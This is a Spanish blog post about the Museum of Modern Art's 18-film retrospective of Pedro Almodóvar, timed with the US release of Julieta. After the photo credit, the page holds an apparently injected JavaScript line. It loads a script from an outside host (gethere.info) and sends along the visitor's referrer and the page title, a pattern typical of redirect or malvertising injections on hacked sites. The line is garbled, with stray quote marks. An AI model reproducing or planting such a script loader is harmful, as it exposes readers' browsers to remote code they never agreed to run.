Almodóvar en el MoMA

11/12/2016

VANITY FAIR- PEDRO ALMODÓVAR+PENELOPE CRUZ

Hay halagos y halagos. Que uno de los museos más relevantes del mundo te acoja y te rinda homenaje por segunda vez -en 2011 ya había estado por aquí- es un grandísimo halago. Pedro Almodóvar debe incluso haberse sonrojado… Y es que hasta el próximo 17 de diciembre, el Museum of Modern Art de Nueva York (MoMA) ofrece una muestra basada en la filmografía del director manchego. Todo apunta que las fechas de la muestra han coincidido, intencionadamente, con el estreno de la última cinta del español en Estados Unidos: Julieta. De hecho, es esta cinta la que dio el pistoletazo de salida a la muestra, con la presencia de Pedro y con un aforo completo. El éxito de esta cinta allende los mares está siendo rotundo. Que su base literaria sea más anglosajona que latina -está basada en los relatos cortos de la canadiense Alice Munro– y que en un primer momento se pensara en ella para ser rodada en inglés y con Meryl Streep a la cabeza, puede tener mucho que ver.

Las cintas más significativas de Almodóvar están incluidas en esta exposición. Un ciclo de 18 películas que incluye desde sus primeros trabajos -como Pepi, Luci, Bom y otras chicas del montón-, hasta sus trabajos más intimistas -¿Qué he hecho yo para merecer esto?-, pasando por sus más aplaudidos y premiados largometrajesHable con ella, Todo sobre mi madre, con ambas consiguió ganar un Oscar-.

¿Qué por qué un Museo como el MoMA rinde tributo a nuestro cineasta? Pues porque el cineasta español ya ha conseguido hacerse un hueco en el panorama del séptimo arte más internacional. Porque el nombre de Pedro Almodóvar conlleva una serie de buenas aptitudes que al mundo del cine y del arte no se le escapan: entre otras muchas cosas, Pedro ha conseguido crear con sus películas todo un colorista universo de personajes -la mayoría femeninos- difíciles y particulares. El nombre de Pedro Almodóvar resuena ya en casi cualquier parte del mundo.

Foto | The Brandery

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO